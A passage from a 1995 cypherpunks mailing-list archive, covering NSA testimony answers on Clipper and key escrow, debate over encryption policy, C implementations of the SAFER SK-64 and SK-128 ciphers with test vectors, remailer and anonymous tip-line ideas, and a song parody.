position, as announced by the White House on February 4, that current export controls must remain in place and that regulatory changes should be implemented to speed exports and reduce the licensing burden on exporters. The bill you reference appears to be inconsistent with the Administration position. I would be happy to provide you further information on the Administration's reasons for maintaining the current export controls in an appropriate setting. *Questions from Senator Murray: Q: In my office in the Hart building this February, I downloaded from the Internet an Austrian program that uses DES encryption. This was on a laptop computer, using a modem over a phone line. The Software Publishers' Association says there are at least 120 DES or comparable programs world wide. However, U.S. export control laws prohibit American exporters from selling comparable DES programs abroad. With at least 20 million people hooked up to the Internet, how do U.S. export controls actually prevent criminals, terrorists, or whoever from obtaining DES encryption software? Answer: Serious users of encryption do not entrust their security to software distributed via networks o bulletin boards. There is simply too much risk that viruses, Trojan Horses, programming errors, and other security flaws may exist in such software which could not be detected by the user. Serious users of encryption, those who depend on encryption to protect valuable data and cannot afford to take such chances, instead turn to other sources in which they can have greater confidence. Such serious users include not only entitles which may threaten U.S. national security interests, but also businesses and other major consumers of encryption products. Encryption software distribution via Internet, bulletin board, or modem does not undermine the effectiveness of encryption export controls. [Primary written questions for Admiral McConnell] 1. The Defense Authorization Bill for Fiscal Year 1994 has authorized $800,000 to be spent by the National Research Council of the National Academy of Sciences to conduct a study of federal encryption policy. Can we wait to implement the key escrow encryption program until we have the benefit of the NRC's study? Do you think this study is necessary? Should this study be expedited? Answer: We do not believe that we can wait until after the NRC study is completed in 1996 to begin implementation of the key escrow initiative. The information technology industry is dynamic and fast-moving, and to wait another two years or more would, we believe, jeopardize the success of the initiative. Industry demand for encryption products is growing, and the technology is available now to meet that demand with encryption products that provide an outstanding level of security to the user conduct lawful wiretaps. To wait for the completion of the NRC study to other encryption products which would defeat lawful wiretaps. We believe that such a delay would not be in the best interest of the American people. Neither do we believe that the study should be expedited. For our part, we will carefully consider the conclusions of the NRC study. We expect that it will give very careful consideration to the issues, and we would not want the pressure of an unnecessarily short deadline to limit the study group's ability to produce the best report possible. 2. The Administration has said that it is continuing to restrict export of the most sophisticated encryption devices, in part, "because of the concerns of our allies who fear that strong encryption technology would inhibit their law enforcement capabilities." Do we really need to help our allies by prohibiting the export of strong American encryption products, since those same countries can simply control the encryption bought within their borders? Answer: Exports of encryption products are subject to review primarily to protect U.S. national interests, including national security, law enforcement, foreign policy, and other important interests. The law enforcement concerns of our allies are a consideration, especially as the ability of our allies to combat terrorism, drug trafficking, and other international law enforcement problems can have direct benefits to the United States. However, foreign law enforcement concerns do not drive our export control policy. We would continue to review encryption exports to protect U.S. national interests even if foreign law enforcement concerns disappeared. 3. Do you know whether foreign governments would be interested in importing key escrow encryption products to which they hold the decoding keys? Answer: Several foreign governments have expressed interest in key escrow encryption technology due to their own law enforcement concerns. There have been some preliminary discussions, but issues such as who would hold the escrowed keys and the circumstances of government access to escrowed keys must be fully vetted. 4. The Government wants the key escrow encryption standard to become the de facto industry standard in the United States. Would the Government abandon the Clipper Chip program if it is shown to be unsuccessful beyond government use? Answer: We do not expect the program to be unsuccessful beyond government. We have developed a sound security product that we expect will find many uses in government information systems and further believe that government use will bring with it a commercial market, particularly in the defense sector. We have developed a sound security product that we expect will find many uses in government information systems regardless of its success in commercial markets. 5. Openly available devices, such as Intel-compatible microprocessors, have seen dramatic gains, but only because everyone was free to try to build a better version. Given the restrictions on who can build devices with the classified skipjack algorithm, how will key escrow chips keep up with advances in semiconductor speed, power, capacity and integration? Answer: Despite the requirements that a firm must meet to produce key escrow encryption chips, we expect that there will be a number of manufacturers competing against each other to produce the best product, and that such competition will drive them to keep up with the latest technological advances. It is worth noting that only a few companies can produce the sophisticated microprocessors you reference, yet the competition in that market has driven them to achieve remarkable advances in that technology. NSA's STU-III secure telephone program provides an example of a cryptographic product line that keeps pace with technology. The presence of a classified algorithm does not preclude keeping pace with technology. Through NSA's use of a competitive, multi-vendor approach, STU-III secure telephone products have continued to evolve in response to user requirements and technological advances despite their use of a classified encryption algorithm and the consequent need for security restrictions on the manufacturers. 6. How well does the Skipjack algorithm work on telecommunications operating at very high speeds. Is NSA working on another algorithm, called BATON, that could be used in high speeds with a key escrow system? Will Capstone be compatible with BATON? Answer: Using currently available microelectronics technology the SKIPJACK algorithm could not be used for encryption at very high speeds. BATON is the name of an algorithm developed by NSA that could be used at higher rates of speed. We have no plans to develop key escrow encryption devices using BATON, however. Instead, we are considering another algorithm for use at high speeds with a key escrow system. A high-speed key escrow device based on an algorithm other than SKIPJACK would not be "compatible with Capstone" in the sense that traffic encrypted by such a device could not be decrypted by Capstone, and vice versa. However, since such a device would be used for much higher-speed applications than those for which Capstone was designed, there would be no need for it to be compatible with Capstone in that sense. 7. Can Capstone be used to encrypt video programming? If so, have cable companies been approached by any government agency to use Capstone to scramble or encrypt cable program? Answer: Capstone could be used to encrypt any digital signal, including video programming, operating at up to about 10 million bits per second. It could be used for encrypting individual video channels but not for bulk encryption of many channels multiplexed together in a single link. NSA is not aware of any government agency approaching cable companies to urge the use of Capstone. Two manufacturers have asked us about the suitability of key escrow devices for this purpose, however. 8. Encryption software is available that can be used with Clipper to encrypt a message before after it has been encrypted with Clipper. This "double encrypting" risks bypassing the key escrow feature. If a sender first encrypts the message with software using DES, and then transmits the message "double encrypted" with Clipper, can tell you from looking at the cipher, or encrypted text, that the underlying message was encrypted? Answer: The only way to tell that a message has been "double encrypted" in this way would be to decrypt the "outer layer" of encryption, i.e. that done with Clipper. Only then would one be able to tell that the message had first been encrypted with something else. ---------- _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From cme at TIS.COM Thu Sep 14 08:29:58 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 14 Sep 95 08:29:58 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <199509132016.NAA02103@comsec.com> Message-ID: <9509141511.AA05860@tis.com> >From: "Peter Trei" >Date: Wed, 13 Sep 1995 10:37:46 -6 >-------------------------------------------------------------- > > Towards this goal, I have written a short Q&A that could be >used as a model when discussing cryptography with non-cypherpunks. >Q: Aren't LEAs worried that strong encryption will make it more >difficult for them to catch crooks? Yes, some are -- especially at higher levels. LEAs in the field (by my informal survey) are not. They're worried instead about manpower and normal tools (e.g., computers back at the station, radios, ...). Meanwhile, there is an advantage for LEAs when criminals have, for example, encrypting phones. A phone itself gives the person using it a sense of privacy. [This is probably a side effect of the psychological cues which result from using a handset. If you pull a handset away from your ear or mouth very far, you can't converse. Someone standing in the same room as you probably can not hear the words you hear in your ear. If the handset were another person, this behavior would be called "whispering" -- something done to achieve privacy.] An encrypting phone (or e-mail for that matter) gives the impression (and, to some extent, reality) of extra privacy. When there is a perception of privacy, the people conversing are more likely to reveal things which they don't want overheard. If these people are ciminals, those things might be used as evidence against them. The advantage for LEAs comes from the fact that the person at the other end of the line might well be an LEA in disguise. This is especially true on the Internet (or on AOL, to cite a recent case), where the other person may well be someone you have never met and therefore haven't checked out to verify level of criminality. >Q: What's this 'key escrow' thing? > >A: Some government agencies have been trying to figure out methods which >simultaneously permit US citizens to use strong cryptography against >criminal eavesdroppers, while retaining the ease with which LEAs can >currently tap your calls. The schemes generally involve something >mistitled 'key escrow', in which copies of cryptographic keys would be >stored at sites accessible by LEAs. 'key escrow' is a code word for government access to the unencrypted message. It is a persistent theme, dating back to the NSA's CCEP in about 1987. 'key escrow' is also the name of a technique by which the most recent example of this access, Clipper/Capstone, achieved that government access. ( see http://www.clark.net/pub/cme/html/no-ke.html#etymology ) >Q: Why do you object to it? > >A: This is a bit as if your local police department ordered you to send >them copies of all of your house, car, and office keys, so that they >could enter whenever they felt it warranted, without your knowledge. > >Even assuming no keys will be leaked to criminals from such a valuable >archive, it's an incredible boondoggle. The inital cost is tens of >millions of dollars per year, by the most conservative government >estimates. In reality, it's likely to be hundreds of millions a year, >all to enable LEAs to investigate a type of crime which does not yet >occur, and may never occur. My preferred analogy so far (from http://www.clark.net/pub/cme/html/avss.html) is: It is one thing to permit a police officer to look in an open window, see a criminal act in progress, start an investigation or make an arrest and use what he or she saw as evidence in an eventual trial of the perpetrators. It is something entirely different to prohibit people from using curtains on the grounds that curtains might prevent a police officer from seeing a criminal act in progress. >- ------------------------------------------------------ >Cute signature quotes are needed. There was a great one last week at NIST: "Daddy ... if your data is your own property, does it become less your property after you encrypt it?" [Speaker at the NIST workshop, September 6-7, 1995] - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From fstuart at vetmed.auburn.edu Thu Sep 14 08:35:41 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Thu, 14 Sep 95 08:35:41 PDT Subject: An opportunity not to be missed Message-ID: <199509141535.KAA05557@snoopy.vetmed.auburn.edu> >> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for >> use through the remailers)? You could set up a web-page with instructions >> and a list of crimes for which there are rewards. > >Someone already tried that. The cops got a copy of the WWW logs and >started investigating everyone who'd looked at the WWW page... So at the >least you'd need a bunch of anonymous WWW proxies as well. Yuck. Well, if this is going to be a problem, you could distribute a periodic FAQ via Usenet instead. >There's also the problem that the current ecash systems do not provide >payee anonymity, so if you pay informers with ecash they can be traced if >the bank and payer collude. That's a real problem and underscores the need for better ecash. :) Frank Stuart | (Admiral Grace) Hopper's Law: fstuart at vetmed.auburn.edu | It's easier to get forgiveness than permission. From hroller at c2.org Thu Sep 14 09:12:58 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Thu, 14 Sep 95 09:12:58 PDT Subject: No Subject Message-ID: <199509141607.JAA25886@infinity.c2.org> /* SAFER SK-64 By James L. Massey who did not do this conversion and is not responsible for any bugs in it. This a 'C' conversion of the reference Turbo Pascal implementation Examples of Encryption with SAFER SK-64 (i.e., with the strengthened key schedule of 64 bits.) PLAINTEXT is 1 2 3 4 5 6 7 8 The KEY is 0 0 0 0 0 0 0 1 after round 1 131 177 53 27 130 249 141 121 after round 2 68 73 32 102 134 54 206 57 after round 3 248 213 217 11 23 68 0 243 after round 4 194 62 109 79 24 18 13 84 after round 5 153 156 246 172 40 72 173 39 after round 6 154 242 34 6 61 35 216 28 CRYPTOGRAM is 21 27 255 2 173 17 191 45 PLAINTEXT is 1 2 3 4 5 6 7 8 The KEY is 1 2 3 4 5 6 7 8 after round 1 223 98 177 100 46 234 13 210 after round 2 182 246 230 93 158 14 48 89 after round 3 45 234 128 149 40 101 10 134 after round 4 30 17 249 236 158 120 69 100 after round 5 1 200 182 241 0 127 152 162 after round 6 144 85 94 214 5 38 65 150 CRYPTOGRAM is 95 206 155 162 5 132 56 199 */ #include /* globals */ unsigned char a1,a2,a3,a4,a5,a6,a7,a8, b1,b2,b3,b4,b5,b6,b7,b8, r; unsigned char k[21][8],k1[9]; int logtab[256],exptab[256],i,j,n; mat1(p1,p2,q1,q2) unsigned char p1,p2,*q1,*q2; { *q2=p1+p2; *q1=*q2+p1; } invmat1(p1,p2,q1,q2) unsigned char p1,p2,*q1,*q2; { *q1=p1-p2; *q2=-*q1+p2; } init_tables() { /* This portion of the program computes the powers of the primitive element 45 of the finite field GF(257) and stores these numbers in the table "exptab". The corresponding logarithms to the base 45 are stored in the table "logtab" */ logtab[1]=0; exptab[0]=1; for(i=1;i<=255;i++) { exptab[i]=(45*exptab[i-1]) % 257; logtab[exptab[i]]=i; } exptab[128]=0; logtab[0]=128; exptab[0]=1; } set_rounds() { int rounds; do { printf("Enter number of rounds (max 10): "); scanf("%d",&rounds); } while(rounds<1 || rounds>10); r=(unsigned char)rounds; } get_plaintext() { int i1,i2,i3,i4,i5,i6,i7,i8; printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n"); scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8); a1=(unsigned char)i1; a2=(unsigned char)i2; a3=(unsigned char)i3; a4=(unsigned char)i4; a5=(unsigned char)i5; a6=(unsigned char)i6; a7=(unsigned char)i7; a8=(unsigned char)i8; } get_key() { int i1,i2,i3,i4,i5,i6,i7,i8; printf("Enter key as 8 bytes (0-255 separated by spaces)\n"); scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8); k[0][0]=k1[0]=(unsigned char)i1; k[0][1]=k1[1]=(unsigned char)i2; k[0][2]=k1[2]=(unsigned char)i3; k[0][3]=k1[3]=(unsigned char)i4; k[0][4]=k1[4]=(unsigned char)i5; k[0][5]=k1[5]=(unsigned char)i6; k[0][6]=k1[6]=(unsigned char)i7; k[0][7]=k1[7]=(unsigned char)i8; } key_schedule() { /* append a "parity byte" to the key k1 */ k1[8]=k1[0]^k1[1]^k1[2]^k1[3]^k1[4]^k1[5]^k1[6]^k1[7]; /* derive keys k2, k3, ... k2r+1 from input key k1 */ for(n=2;n<=(2*r)+1;n++) { /* each byte of the key k1 is left rotated by 3 */ for(j=0;j<=8;j++) k1[j]=(k1[j]<<3) + (k1[j]>>5); /* the key bias is added here to the right rotated k1 */ for(j=1;j<=8;j++) k[n-1][j-1]=k1[(j+n-2) % 9]+exptab[exptab[(9*n)+j]]; } } encrypt() { for(i=1;i<=r;i++) { /* Key 2i-1 is mixed bit and byte added to the round input */ a1=a1 ^ k[2*i-2][0]; a2=a2 + k[2*i-2][1]; a3=a3 + k[2*i-2][2]; a4=a4 ^ k[2*i-2][3]; a5=a5 ^ k[2*i-2][4]; a6=a6 + k[2*i-2][5]; a7=a7 + k[2*i-2][6]; a8=a8 ^ k[2*i-2][7]; /* The result now passes through the nonlinear layer */ b1=exptab[a1]; b2=logtab[a2]; b3=logtab[a3]; b4=exptab[a4]; b5=exptab[a5]; b6=logtab[a6]; b7=logtab[a7]; b8=exptab[a8]; /* Key 2i is now mixed byte and bit added to the result */ b1=b1 + k[2*i-1][0]; b2=b2 ^ k[2*i-1][1]; b3=b3 ^ k[2*i-1][2]; b4=b4 + k[2*i-1][3]; b5=b5 + k[2*i-1][4]; b6=b6 ^ k[2*i-1][5]; b7=b7 ^ k[2*i-1][6]; b8=b8 + k[2*i-1][7]; /* The result now enters the linear layer */ mat1(b1,b2,&a1,&a2); mat1(b3,b4,&a3,&a4); mat1(b5,b6,&a5,&a6); mat1(b7,b8,&a7,&a8); mat1(a1,a3,&b1,&b2); mat1(a5,a7,&b3,&b4); mat1(a2,a4,&b5,&b6); mat1(a6,a8,&b7,&b8); mat1(b1,b3,&a1,&a2); mat1(b5,b7,&a3,&a4); mat1(b2,b4,&a5,&a6); mat1(b6,b8,&a7,&a8); /* The round is now completed! */ printf("after round %d %3d %3d %3d %3d %3d %3d %3d %3d\n", (int)i,a1,a2,a3,a4,a5,a6,a7,a8); } /* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */ a1=a1 ^ k[2*r][0]; a2=a2 + k[2*r][1]; a3=a3 + k[2*r][2]; a4=a4 ^ k[2*r][3]; a5=a5 ^ k[2*r][4]; a6=a6 + k[2*r][5]; a7=a7 + k[2*r][6]; a8=a8 ^ k[2*r][7]; } main() { init_tables(); for(;;) { set_rounds(); get_plaintext(); get_key(); printf("PLAINTEXT is %3d %3d %3d %3d %3d %3d %3d %3d\n", a1,a2,a3,a4,a5,a6,a7,a8); printf("THE KEY IS %3d %3d %3d %3d %3d %3d %3d %3d\n", k[0][0],k[0][1],k[0][2],k[0][3],k[0][4],k[0][5],k[0][6],k[0][7]); key_schedule(); encrypt(); printf("CRYPTOGRAM IS %3d %3d %3d %3d %3d %3d %3d %3d\n\n", a1,a2,a3,a4,a5,a6,a7,a8); } } From adam at bwh.harvard.edu Thu Sep 14 09:12:58 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 14 Sep 95 09:12:58 PDT Subject: NSA on GAK In-Reply-To: <9509141525.AA21098@cantina.verity.com> Message-ID: <199509141601.MAA06167@calloway.bwh.harvard.edu> | | Senate Subcommittee on Technology and the Law | Hearing on the Administration's Key Escrow Encryption Standard | | Written Questions for Vice Admiral McConnell, NSA | *Questions from Senator Murray: | | Q: In my office in the Hart building this February, I downloaded | from the Internet an Austrian program that uses DES encryption. [...] | With at least 20 million people hooked up to the | Internet, how do U.S. export controls actually prevent criminals, | terrorists, or whoever from obtaining DES encryption software? | | Answer: Serious users of encryption do not entrust their | security to software distributed via networks o bulletin boards. | There is simply too much risk that viruses, Trojan Horses, | programming errors, and other security flaws may exist in such | software which could not be detected by the user. Serious users of | encryption, those who depend on encryption to protect valuable data | and cannot afford to take such chances, instead turn to other | sources in which they can have greater confidence. Such serious | users include not only entitles which may threaten U.S. national | security interests, but also businesses and other major consumers | of encryption products. Encryption software distribution via | Internet, bulletin board, or modem does not undermine the | effectiveness of encryption export controls. "Help me understand here. You say that serious users of encryption don't use software distributed via network. In that case, you would have no objection to PGP being exported, as serious users of encryption don't use it?" From hroller at c2.org Thu Sep 14 09:19:58 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Thu, 14 Sep 95 09:19:58 PDT Subject: No Subject Message-ID: <199509141614.JAA26330@infinity.c2.org> /* SAFER SK-128 designed by James L. Massey who did not do this conversion and is not responsible for any bugs in it. This a 'C' conversion of the reference Turbo Pascal implementation Examples of Encryption with SAFER SK-128 (i.e., with the strengthened key schedule of 128 bits.) PLAINTEXT is 1 2 3 4 5 6 7 8 KEY Ka is 0 0 0 0 0 0 0 1 KEY Kb is 0 0 0 0 0 0 0 1 after round 1 131 177 53 27 130 249 141 121 after round 2 68 73 32 102 134 54 206 57 after round 3 248 213 217 11 23 68 0 243 after round 4 194 62 109 79 24 18 13 84 after round 5 153 156 246 172 40 72 173 39 after round 6 154 242 34 6 61 35 216 28 after round 7 100 31 172 67 44 75 133 219 after round 8 78 226 239 135 210 83 93 72 after round 9 72 64 46 195 163 159 243 114 after round10 3 133 76 190 191 52 220 123 CRYPTOGRAM is 65 76 84 90 182 153 74 247 PLAINTEXT is 1 2 3 4 5 6 7 8 KEY Ka is 1 2 3 4 5 6 7 8 KEY Kb is 0 0 0 0 0 0 0 0 after round 1 64 214 74 216 103 222 26 54 after round 2 61 14 68 15 46 111 124 80 after round 3 197 124 96 59 255 24 2 30 after round 4 63 59 214 103 236 166 153 24 after round 5 66 254 26 45 152 223 5 122 after round 6 89 47 58 105 161 38 135 45 after round 7 19 202 174 44 57 206 52 25 after round 8 78 179 113 208 169 26 121 22 after round 9 53 17 81 215 120 37 206 246 after round10 189 177 9 0 186 82 208 253 CRYPTOGRAM is 255 120 17 228 179 167 46 113 PLAINTEXT is 1 2 3 4 5 6 7 8 KEY Ka is 0 0 0 0 0 0 0 0 KEY Kb is 1 2 3 4 5 6 7 8 after round 1 95 186 209 220 166 66 213 10 after round 2 200 65 189 120 96 135 42 166 after round 3 64 169 43 166 132 171 31 40 after round 4 199 167 76 189 145 158 241 19 after round 5 71 55 184 212 108 198 77 108 after round 6 173 197 139 11 17 48 97 59 after round 7 17 51 142 4 170 7 207 124 after round 8 62 205 253 225 167 179 228 202 after round 9 133 168 127 138 193 243 34 226 after round10 59 194 69 220 220 231 123 148 CRYPTOGRAM is 73 201 157 152 165 188 89 8 */ #include /* globals */ unsigned char a1,a2,a3,a4,a5,a6,a7,a8, b1,b2,b3,b4,b5,b6,b7,b8, r; unsigned char k[25][8],ka[9],kb[9]; int logtab[256],exptab[256],i,j,n; mat1(p1,p2,q1,q2) unsigned char p1,p2,*q1,*q2; { *q2=p1+p2; *q1=*q2+p1; } invmat1(p1,p2,q1,q2) unsigned char p1,p2,*q1,*q2; { *q1=p1-p2; *q2=-*q1+p2; } init_tables() { /* This portion of the program computes the powers of the primitive element 45 of the finite field GF(257) and stores these numbers in the table "exptab". The corresponding logarithms to the base 45 are stored in the table "logtab" */ logtab[1]=0; exptab[0]=1; for(i=1;i<=255;i++) { exptab[i]=(45*exptab[i-1]) % 257; logtab[exptab[i]]=i; } exptab[128]=0; logtab[0]=128; exptab[0]=1; } set_rounds() { int rounds; do { printf("Enter number of rounds (max 12): "); scanf("%d",&rounds); } while(rounds<1 || rounds>12); r=(unsigned char)rounds; } get_plaintext() { int i1,i2,i3,i4,i5,i6,i7,i8; printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n"); scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8); a1=(unsigned char)i1; a2=(unsigned char)i2; a3=(unsigned char)i3; a4=(unsigned char)i4; a5=(unsigned char)i5; a6=(unsigned char)i6; a7=(unsigned char)i7; a8=(unsigned char)i8; } get_key() { int i1,i2,i3,i4,i5,i6,i7,i8; printf("Enter left half of key as 8 bytes (0-255 separated by spaces)\n"); scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8); ka[0]=(unsigned char)i1; ka[1]=(unsigned char)i2; ka[2]=(unsigned char)i3; ka[3]=(unsigned char)i4; ka[4]=(unsigned char)i5; ka[5]=(unsigned char)i6; ka[6]=(unsigned char)i7; ka[7]=(unsigned char)i8; printf("Enter right half of key as 8 bytes (0-255 separated by spaces)\n"); scanf("%d%d%d%d%d%d%d%d",&i1,&i2,&i3,&i4,&i5,&i6,&i7,&i8); kb[0]=(unsigned char)i1; kb[1]=(unsigned char)i2; kb[2]=(unsigned char)i3; kb[3]=(unsigned char)i4; kb[4]=(unsigned char)i5; kb[5]=(unsigned char)i6; kb[6]=(unsigned char)i7; kb[7]=(unsigned char)i8; } key_schedule() { /* append a "parity byte" to the key k1 */ ka[8]=ka[0]^ka[1]^ka[2]^ka[3]^ka[4]^ka[5]^ka[6]^ka[7]; kb[8]=kb[0]^kb[1]^kb[2]^kb[3]^kb[4]^kb[5]^kb[6]^kb[7]; /* derive keys k1, k2, ... k2r+1 from input key ka, kb */ for(j=0;j<8;j++) k[0][j]=kb[j]; /* each byte of the key ka is right rotated by 3 */ for(j=0;j<9;j++) ka[j]=(ka[j]>>3) + (ka[j]<<5); for(i=1;i<=r;i++) { /* each byte of the keys ka and kb is left rotated by 6 */ for(j=0;j<=8;j++) { ka[j]=(ka[j]<<6) + (ka[j]>>2); kb[j]=(kb[j]<<6) + (kb[j]>>2); } /* the key bias is added to give keys k2i-1 and k2i */ for(j=1;j<=8;j++) { k[2*i-1][j-1]=ka[(j+2*i-2) % 9]+exptab[exptab[18*i+j]]; k[2*i][j-1]=kb[(j+2*i-1) % 9]+exptab[exptab[18*i+9+j]]; } } } encrypt() { for(i=1;i<=r;i++) { /* Key 2i-1 is mixed bit and byte added to the round input */ a1=a1 ^ k[2*i-2][0]; a2=a2 + k[2*i-2][1]; a3=a3 + k[2*i-2][2]; a4=a4 ^ k[2*i-2][3]; a5=a5 ^ k[2*i-2][4]; a6=a6 + k[2*i-2][5]; a7=a7 + k[2*i-2][6]; a8=a8 ^ k[2*i-2][7]; /* The result now passes through the nonlinear layer */ b1=exptab[a1]; b2=logtab[a2]; b3=logtab[a3]; b4=exptab[a4]; b5=exptab[a5]; b6=logtab[a6]; b7=logtab[a7]; b8=exptab[a8]; /* Key 2i is now mixed byte and bit added to the result */ b1=b1 + k[2*i-1][0]; b2=b2 ^ k[2*i-1][1]; b3=b3 ^ k[2*i-1][2]; b4=b4 + k[2*i-1][3]; b5=b5 + k[2*i-1][4]; b6=b6 ^ k[2*i-1][5]; b7=b7 ^ k[2*i-1][6]; b8=b8 + k[2*i-1][7]; /* The result now enters the linear layer */ mat1(b1,b2,&a1,&a2); mat1(b3,b4,&a3,&a4); mat1(b5,b6,&a5,&a6); mat1(b7,b8,&a7,&a8); mat1(a1,a3,&b1,&b2); mat1(a5,a7,&b3,&b4); mat1(a2,a4,&b5,&b6); mat1(a6,a8,&b7,&b8); mat1(b1,b3,&a1,&a2); mat1(b5,b7,&a3,&a4); mat1(b2,b4,&a5,&a6); mat1(b6,b8,&a7,&a8); /* The round is now completed! */ printf("after round %d %3d %3d %3d %3d %3d %3d %3d %3d\n", (int)i,a1,a2,a3,a4,a5,a6,a7,a8); } /* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */ a1=a1 ^ k[2*r][0]; a2=a2 + k[2*r][1]; a3=a3 + k[2*r][2]; a4=a4 ^ k[2*r][3]; a5=a5 ^ k[2*r][4]; a6=a6 + k[2*r][5]; a7=a7 + k[2*r][6]; a8=a8 ^ k[2*r][7]; } main() { init_tables(); for(;;) { set_rounds(); get_plaintext(); get_key(); printf("PLAINTEXT is %3d %3d %3d %3d %3d %3d %3d %3d\n", a1,a2,a3,a4,a5,a6,a7,a8); printf("KEY Ka IS %3d %3d %3d %3d %3d %3d %3d %3d\n", ka[0],ka[1],ka[2],ka[3],ka[4],ka[5],ka[6],ka[7]); printf("KEY Kb IS %3d %3d %3d %3d %3d %3d %3d %3d\n", kb[0],kb[1],kb[2],kb[3],kb[4],kb[5],kb[6],kb[7]); key_schedule(); encrypt(); printf("CRYPTOGRAM IS %3d %3d %3d %3d %3d %3d %3d %3d\n\n", a1,a2,a3,a4,a5,a6,a7,a8); } } From dcl at panix.com Thu Sep 14 09:25:16 1995 From: dcl at panix.com (David C. Lambert) Date: Thu, 14 Sep 95 09:25:16 PDT Subject: Crimestoppers anon tip mailbox Message-ID: <199509141625.MAA08120@panix.com> -----BEGIN PGP SIGNED MESSAGE----- >> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for >> use through the remailers)? You could set up a web-page with instructions >> and a list of crimes for which there are rewards. > >Someone already tried that. The cops got a copy of the WWW logs and >started investigating everyone who'd looked at the WWW page... Right - this was an abduction case in Florida, if memory serves. > So at the >least you'd need a bunch of anonymous WWW proxies as well. I don't see that as a problem. I'm about to set up at least one of these myself, and I believe that there are others around - please correct me if I'm wrong. In any case, there needn't be a web page to do the actual reporting. There can be web pages to advertise, and then a simple maildrop for the tips. You could even arrange that the maildrop send everything to a remailer for delivery to a non-advertised address for an extra layer of protection (in case someone forgot to use a remailer to send the tip in the first place, or they screwed up in a way that revealed their identity). David C. Lambert dcl at panix.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFhV8KpplsfgM88VAQHwIgP/eO5eQIb6PgraSAGeoWJ4Jvc3F8tTkY2u ZiBfuWN3XMu8JRUQOAcW7Vs4lfgBBm7HDHe05mbmczQGsMTzhcLErQ1m1uPup+Xw LJmbI2hWjxmuTZI14zoTAnTeTJt3L2XLwl7BPpkWkB7EIrERpua2FYIfdqArFO4e AxEsD+ybA/k= =pcn4 -----END PGP SIGNATURE----- From potock at cig.mot.com Thu Sep 14 09:38:41 1995 From: potock at cig.mot.com (Richard Potocki) Date: Thu, 14 Sep 95 09:38:41 PDT Subject: MIME Security Issues Message-ID: <199509141641.MAA11889@po_box.cig.mot.com> Does anybody wish to express any comments regarding MIME security. I have read the RFC's and any/all doc's I could find on this issue. I understand what the security risks are, but I have been unsuccessful in my attempts to find info regarding what is being done, or has been done to correct this. If I remember correctly, I think I once saw a brief mention of filters or something. I am new to this stuff, so any assistance would greatly appreciated. Thank you, Rick From hallam at w3.org Thu Sep 14 09:42:30 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 14 Sep 95 09:42:30 PDT Subject: DD, pedaphiles, and Terrorists, oh my In-Reply-To: Message-ID: <9509141640.AA30602@zorch.w3.org> >> Today's Washington Post (9/14) has a front page article on a bust of >> 12 computer using pedaphiles. >> NBC news is saying that Janet Reno will have a news conference >> later this morning. >> Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards >> will be held. >> Coincidence? > I think not.. Kind of like the coincidence that just before any gun >law votes, some maniac goes on a shooting spree.. ;) Nope, its more likely to be because of the telecommunications bill and the Exon ammendment. They are demonstrating the sufficiency of existing laws. We never used to see kiddie porn on the internet. The net would go balistic if a picture of a teen age nude was posted. Recently there has been a flood of hard core paedophile material. Phill From trei at process.com Thu Sep 14 09:59:17 1995 From: trei at process.com (Peter Trei) Date: Thu, 14 Sep 95 09:59:17 PDT Subject: [NOISE] Alice's Remailer site (was:Re: Digital Fingerprinting) Message-ID: <9509141659.AA28685@toad.com> > From: patrick at Verity.COM (Patrick Horgan) > > From: Mac Norton > > To: Patrick Horgan > > On Wed, 13 Sep 1995, Patrick Horgan wrote: > > > > > Then, in W.Ky., as in Stockbridge, "You can get > > > > > anything you want..."? :) > > > Why do I feel like I'm sitting on the group W bench? > > I don't know, kid, what you in for? > Encryption. And they all moved away from me on the group W bench there, > talking mean hairy eyeballs and all sorts of things until I said, and > annoying the NSA, and they all moved back, talking about crime, PEM, PGP, > and liberty and justice for all;) > Patrick I've seen various 'Alice Restaurant' pastiches, Alice's NNTP server, Alices MIT GUI, etc. I guess it's time to try to do one for crypto.... This song is called Alice's Remailer site and it's about Alice, and the remailer site, but Alices Remailer site is not the name of the Remailer site, it's the name of the song, and that's why I called this song Alice's Remailer site. You can send anything you want through Alices Remailer site. You can send anything you want through Alices Remailer site. Connect right in it's around the back. Halfway down that seventeen inch rack. You can be anyone you want through Alice's Remailer site. etc.... Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From tcmay at got.net Thu Sep 14 10:17:47 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 14 Sep 95 10:17:47 PDT Subject: Child Porn, Morphing, and Pointers Message-ID: At 2:40 PM 9/14/95, Rev. Ben wrote: >> The bill would expand the definition of child pornography >> to include any photograph, film, videotape or computer >> image produced by any means, including electronically by >> computer, if it depicts or appears to depict a minor >> engaging in sexually 